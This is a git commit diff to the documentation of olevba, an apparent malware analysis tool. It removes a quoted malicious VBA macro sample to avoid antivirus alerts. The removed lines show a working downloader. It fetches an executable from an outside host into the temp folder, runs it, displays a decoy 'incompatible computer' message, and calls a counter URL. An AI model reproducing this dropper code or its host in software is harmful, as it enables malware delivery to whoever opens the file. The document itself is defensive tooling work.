Commit 41d98ad562d0db71e23f0c669b2776271fde10a0
1 parent
aaa7c73f
olevba: removed malicious code from documentation to avoid triggering antivirus
Showing
1 changed file
with
2 additions
and
12 deletions
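--- a/oletools/doc/olevba.md
+++ b/oletools/doc/olevba.md
@@ -157,20 +157,10 @@ For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/
 SNVJYQ
 End Sub
 Public Sub SNVJYQ()
-OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.
-exe"
+[Malicious Code...]
 End Sub
 Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
-Dim HRKUYU, lala As Long
-HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
-If HRKUYU = 0 Then OGEXYR = True
-Dim YKPZZS
-YKPZZS = Shell(PHHWIV, 1)
-MsgBox "El contenido de este documento no es compatible con este equipo." &
-vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no
-compatible"
-lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi
-ron("TMP") & "\lkjljlljk", 0, 0)
+[Malicious Code...]
 Application.DisplayAlerts = False
 Application.Quit
 End Function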